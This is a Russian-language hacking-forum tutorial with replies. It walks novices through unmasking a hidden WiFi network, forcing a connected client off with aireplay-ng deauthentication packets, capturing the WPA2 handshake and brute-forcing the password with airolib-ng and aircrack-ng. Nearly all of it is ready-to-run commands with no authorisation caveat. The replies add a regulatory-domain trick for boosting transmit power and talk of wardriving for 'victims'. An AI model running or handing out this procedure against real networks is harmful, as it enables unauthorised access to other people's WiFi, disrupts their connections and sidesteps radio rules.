Статья Раскрытие имени, получение handshake и подбор пароля скрытой точки доступа.

Приветствие

Приветствую всех читателей codeby!

Как и обещал напишу ещё пару статеек\инструкций на тему WiFi пока есть не много свободного времени, Китайский новый год всё таки!

Пробежался беглым взглядом по форуму, не много почитал о некоторых нововведениях на форуме, огорчило что забросили CodebyOS, надеялся испытать её в действие, но видать пока что не судьба...

За то порадовали некоторые плюшки которые пообещала администрация codeby, так же порадовали конкурсы и общее развитие ресурса!

Приятная подача материала, приятное общение и т.п. (в хорошем смысле этого словосочетания) осталось неизменно, это очень радует и хочется что бы так было всегда!

Ооо, чуть не забыл... Очень приятно порадовало развитие магазина Codeby, есть вещи очень даже полезные, но думаю ассортимент все равно увеличится и полезных вещей станет ещё больше, если появятся "глушилки" диктафонов(в том числе и цифровых) и им подобных прослушивающих устройств, думаю от клиентов не будет отбоя.

Предисловие

Как можно понять из названия темы, речь пойдёт о скрытой точки доступа WiFi.Поговорим и рассмотрим на примере как можно такую точку индетефицировать, как перехватить handshake и как его дальше обработать.Большинство из тех кто сталкивается со скрытыми точками доступа обходят их стороной, по просту потому что не знают как с ними работать, как узнать название этой точки и как дальше с ней быть.Но случай разный, бывает и так что наилучший сигнал как раз у этой скрытой точки, зачем использовать то что хуже, когда можно и нужно взять лучшее.

Пробежался поиском по форуму, вроде таких тем не обнаружил, если это так, значить этот топик своего рода эксклюзив!

Введение

Практически как и в других случаях работы с WiFi всё довольно просто, необходим как и в других случаях перехвата handshake подключенный к этой точке клиент, это наверное основное требование в этом случае.

Суть в том что бы заставить подключенного клиента прокричать скрытое имя точки, для этого необходимо деавторизировать этого клиента и повторном подключение этот клиент произнесёт заветные слова, в этот же момент и будет перехвачен handshake, ну а дальше дело техники.

Для всех действий нам потребуется только один инструмент, точнее набор инструментов AirCrack и наличие словаря для подбора пароля.

Подготовка

На борту Kali linux уже установлено всё необходимое, думаю вообще сложностей с установкой AirCrack возникнуть не должно.
Переводим наш адаптер в режим монитора, а для того что бы в процессе всех действий нам ни чего не мешало необходимо убить все процессы работающие с сетью, для этого в консоле набираем:
Код:
airmon-ng check kill
img1.png


Узнаём имя нашего адаптера:
Код:
iwconfig
img2.png


Переводим его в режим монитора:
Код:
airmon-ng start wlan0
img3.png


Действие

И начинаем дампить происходящие в эфире:
Код:
airodump-ng wlan0mon
img4.png

Код:
10:10:10:10:38:8D  -59        4        2    0  11   65  WPA2 CCMP   PSK  <length:  6>
В этой строке видим скрытую точку, "<length: 6>" говорит нам что в скрытом название хранится 6 символов, "10:10:10:10:38:8D" это MAC адрес нашей точки, в колонке ниже видим подключившегося к этой точке клиента:
Код:
10:10:10:10:38:8D  10:10:10:10:D8:69  -23    0 - 0e     0        1
"10:10:10:10:D8:69" MAC адрес подключившегося клиента, в принципе это всё что нам нужно для дальнейших действий.

Далее запускаем airodump с фильтром MAC адреса ("10:10:10:10:38:8D") скрытой точки, на 11 канале и префиксом файла дампа
Код:
airodump-ng --bssid 10:10:10:10:38:8D -c 11 -w output wlan0mon
img5.png


В новом окне параллельно запускаем Aireplay для деаутентификации клиента:
Код:
aireplay-ng --deauth 10 -a 10:10:10:10:38:8D -c 10:10:10:10:D8:69 wlan0mon
img7.png


-a Устанавливаем MAC адрес с целью обмануть клиента и представится точкой доступа к которой подключен, с этим адресом ему будет приходить пакет деаунтефикации, -с MAC адрес клиента на который будут идти пакеты деаунтефикации.

После того как aireplay отработал, в окне с запущенным airodump в поле "Probe" отобразится название скрытой точки, в верхнем правом углу увидим надпись "WPA handshake: 10:10:10:10:38:8D", которая расскажет нам об удачном захвате handshake.

img8.png


Название точки получено, handshake захвачен, пришло время воспользоваться airolib.
Airolib необходима для создания своеобразной базы данных, в которой будут находится названия точек и пароли, после создание базы используя aicrack пробрутим захваченный handshake.

Создаём базу данных "crackhandshake" и импортируем в неё список паролей.
Код:
airolib-ng crackhandshake --import passwd /root/wifi/codebynet.lst
img9.png


Создаём текстовый файл с именем "essid" в который вписываем название точки которое мы уже получили в поле "probe" и сохраняем его в корне.
Код:
leafpad essid
Откроется текстовый редактор, впишете в него полученное имя, в моём случае это "codeby" и сохраните.
Далее импортируем его в уже созданную базу "crackhandshake" с помощью airolib:
Код:
airolib-ng crackhandshake --import essid ./essid
img10.png


Далее проверяем статус созданной базы:
Код:
airolib-ng crackhandshake --stats
img11.png


Выполняем очистку от старого мусора, также это сократит размер базы и запустит проверку целостности нашей базы:
Код:
airolib-ng crackhandshake --clean all
img12.png


Производим пакетную обработку:
Код:
airolib-ng crackhandshake --batch
img13.png


Запускаем проверку нашей базы, с ключом "all" некорректные будут удалены:
Код:
airolib-ng crackhandshake --verify all
img14.png


База создана и проверена, остаётся только запустить перебор полученных вариаций, для этого будем использовать aircrack:
Код:
aircrack-ng -r crackhandshake output-01.cap
img15.png


Разумеется в этом случае всё зависит от вашего словаря, если в нём есть подходящий пароль, то успех гарантирован!

Заключение

Весь ход действий расписан и практически к каждому шагу сделан соответствующий скрин(здесь наверное не много переборщил), разумеется такая подача материала расчитана прежде всего на новичков в этом направление.
 
Последнее редактирование:
Доброго времени суток. Скажите, можно ли в качестве приемника wi fi сети перенастроить как нибудь роутер на прием, дело в том что хочу попытаться "взломать" собственную точку доступа, есть лишний роутер от Ростелеком sagemnon fast , хочу его попытаться перенастроить со стационарного компьютера, и с него же провести тест. В инете ничего путного не нашел. Заранее спасибо.
 
Не пойму, что ты хочешь.
Что значит фраза перенастроить как нибудь роутер на прием
Ты хочешь
  • wi-fi чип роутера перевести в режим монитора ?
или
  • перевести роутер в режим точки доступа ?

Какой смысл ты вкладываешь в фразу очу его попытаться перенастроить ?
 
  • Нравится
Реакции: Tihon49
Доброго времени суток. Скажите, можно ли в качестве приемника wi fi сети перенастроить как нибудь роутер на прием, дело в том что хочу попытаться "взломать" собственную точку доступа, есть лишний роутер от Ростелеком sagemnon fast , хочу его попытаться перенастроить со стационарного компьютера, и с него же провести тест. В инете ничего путного не нашел. Заранее спасибо.
в принципе можно сделать из роутера приёмник вайфай сигнала. для этого нужно лишь проштудировать все даташиты на чипы роутера на их пригодность для перевода в определённые режимы работы, залить в него прошивку openWRT или DDWRT, при этом не стоит забывать об опасности окирпичивания роутера. и дело тут зачастую не только в неопытности. посему проще купить подходящий адаптер и проверить свою сеть вай фай на надёжность.
а ненашли вы в интернете ничего не потому что это большой секрет, а потому что никто этим не занимается, в силу утопичности этого варианта.
 
в принципе можно сделать из роутера приёмник вайфай сигнала. для этого нужно лишь проштудировать все даташиты на чипы роутера на их пригодность для перевода в определённые режимы работы, залить в него прошивку openWRT или DDWRT, при этом не стоит забывать об опасности окирпичивания роутера. и дело тут зачастую не только в неопытности. посему проще купить подходящий адаптер и проверить свою сеть вай фай на надёжность.
а ненашли вы в интернете ничего не потому что это большой секрет, а потому что никто этим не занимается, в силу утопичности этого варианта.
Спасибо за грамотный ответ, не помню где слышал, что на ноуте, можно перенастроить wi fi карту как на прием так и на раздачу сигнала... Возможно кого то ввел в заблуждение, своим вопросом, так как по своей неграмотности считал это делом пары минут, ну или часов(имею ввиду перенастроить роутер на сканирование и прием). В любом случае спасибо. Если это на самом деле так мудренно думаю лучше и пытаться нету смысла, тогда буду пробовать установить на старый смарт Kali Hanter (если не ошибаюсь в названии оси), так же если есть какая инфа по этому вопросу прошу не игнорить, буду благодарен.

Не пойму, что ты хочешь.
Что значит фраза перенастроить как нибудь роутер на прием
Ты хочешь
  • wi-fi чип роутера перевести в режим монитора ?
или
  • перевести роутер в режим точки доступа ?

Какой смысл ты вкладываешь в фразу очу его попытаться перенастроить ?
Как вы грамотно подметили хочу попробовать "wi-fi чип роутера перевести в режим монитора" - то есть сделать из него на время обычный приемник,..
 
wi-fi чип роутера перевести в режим монитора
Для этого, на мой взгляд, нужно:
  • выяснить, поддерживает ли wi-fi чип роутера режим монитора и в положительном случае продолжить
  • установить на роутер прошивку
  • приконнектиться к роутеру по протоколу ssh
  • установить программы airgeddon-ng из репозитория Opkg
  • хакать, хакать и ещё раз хакать ))
 
Последнее редактирование модератором:
  • Нравится
Реакции: Shadow User и Merfi
Для этого, на мой взгляд, нужно:
  • выяснить, поддерживает ли wi-fi чип роутера ражим монитора и в положительном случае продолжить
  • установить на роутер прошивку
  • приконнектиться к роутеру по протоколу ssh
  • установить программы airgeddon-ng из репозитория Opkg
  • хакать, хакать и ещё раз хакать ))
Еще раз спасибо. Для себя вижу три варианта.
1)Ждать из сервиса ноут.
2)Пока жду, проштудировать всю инфу по своему роутеру(думаю если все получиться, лишний опыт не помешает!!!)
3)Все таки попытаться параллельно установить кали на смарт, и пробовать,пробовать,пробовать!!
 
  • Нравится
Реакции: Valkiria
проштудировать всю инфу по своему роутеру(думаю если все получиться, лишний опыт не помешает!!!)
Что тут штудировать ?
Всё штудирование займёт времени до утра ))
Всё, что тебе нужно, находится .
 
Что тут штудировать ?
Всё штудирование займёт времени до утра ))
Всё, что тебе нужно, находится .
Да спасибо. Кстати в вашей прошлой ссылке я все нашел, и вроде все не очень сложно, модель моего роутера есть в списке поддерживаемых устройств!!!
Остается дело техники, достать с "пыльной" полки чудо-роутер и вперед, но это наверное уже с утра, а пока ..... Еще раз спасибо, как говорят, хорошо не тогда когда все знаешь, а тогда, когда знаешь где все искать!!
 
  • Нравится
Реакции: Valkiria
Скажите как вы увеличили мощность адаптера 33dbm у меня она с коробки только 20?
 
Код:
ifconfig wlan1 down && iw reg set BZ && ifconfig wlan1 up && iwconfig wlan1 txpower 30
Нет мощность не увеличивал, но для практики конечно попробую, хотя у меня точка через комнату, честно говоря я еще в настройках копаюсь, вроде все сделал как в мануалах, т.е. перепрошил роут на прием, он вроде бы сеть к которой хочу приконектиться обнаруживает, а вот инета нет. Пароль ввожу никакой реакции, т.е. сканирует сеть лампочка Wi Fi загорается на момент поиска , а потом все...Может подскажете если знаете в чем может быть причина...
 
  • Нравится
Реакции: Lenar
Отличная статья всё предельно разжёвано и по картинке сразу всё понятно! Спасибо
 
Скажите как вы увеличили мощность адаптера 33dbm у меня она с коробки только 20?
Попробуй вот этот скрипт: hiruna/wifi-txpower-unlocker
Должен помочь, если не выйдет, то позже напишу не большой мануал как делал сам, но в скрипте принцип тот же.
 
  • Нравится
Реакции: Solution, Sunnych и Lenar
Извините не по теме но данный код мне не помог поднять мощность
такая ошибка:

Error for wireless request "Set Tx Power" (8B26) :
SET failed on device wlan0 ; Operation not supported.

Попробуй вот этот скрипт: hiruna/wifi-txpower-unlocker
Должен помочь, если не выйдет, то позже напишу не большой мануал как делал сам, но в скрипте принцип тот же.
час поробую думаю разбирусь!
 
Я не знаю, с какой целью желающие поднимают мощность своих адаптеров.
Как и всех, меня этот соблазн не обошёл стороной.
После благополучного усиления мощности своего адаптера я была разочарована тем фактом, что никакого практического эффекта в вардрайвинге он не имеет. Увеличение мощности позволяет адаптеру обнаружить большее количество потенциальных жертв для будущей атаки, но на этом всё удовольствие заканчивается.
Чувствительность адаптера остаётся неизменной.
Поэтому, от увеличение мощности адаптера не улучшит ни качество пойманных рукопожатий, ни их количество.

Для вардрайвинга эта "фича" - ИМХО бесполезна :)
 
Я не знаю, с какой целью желающие поднимают мощность своих адаптеров.
Как и всех, меня этот соблазн не обошёл стороной.
После благополучного усиления мощности своего адаптера я была разочарована тем фактом, что никакого практического эффекта в вардрайвинге он не имеет. Увеличение мощности позволяет адаптеру обнаружить большее количество потенциальных жертв для будущей атаки, но на этом всё удовольствие заканчивается.
Чувствительность адаптера остаётся неизменной.
Поэтому, от увеличение мощности адаптера не улучшит ни качество пойманных рукопожатий, ни их количество.

Для вардрайвинга эта "фича" - ИМХО бесполезна :)
Смена антены на свистке единственный способ увеличить мощность.
 
  • Нравится
Реакции: Lenar
Смена антены на свистке единственный способ увеличить мощность.
Вот как раз смена антенны позволяет поднять чувствительность, не только мощность.
Смена антенны на более мощную позволяет захватить валидные рукопожатия с дальнего расстояния.
Я имела ввиду, что программное увеличение мощности адаптера должно сопровождаться сменой антенны на более мощную.
Важно: мои утверждения основаны только на моём личном опыте и использовании имеющегося у меня "железа" )) Я могу ошибаться ))
 
  • Нравится
Реакции: Глюк и Lenar
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!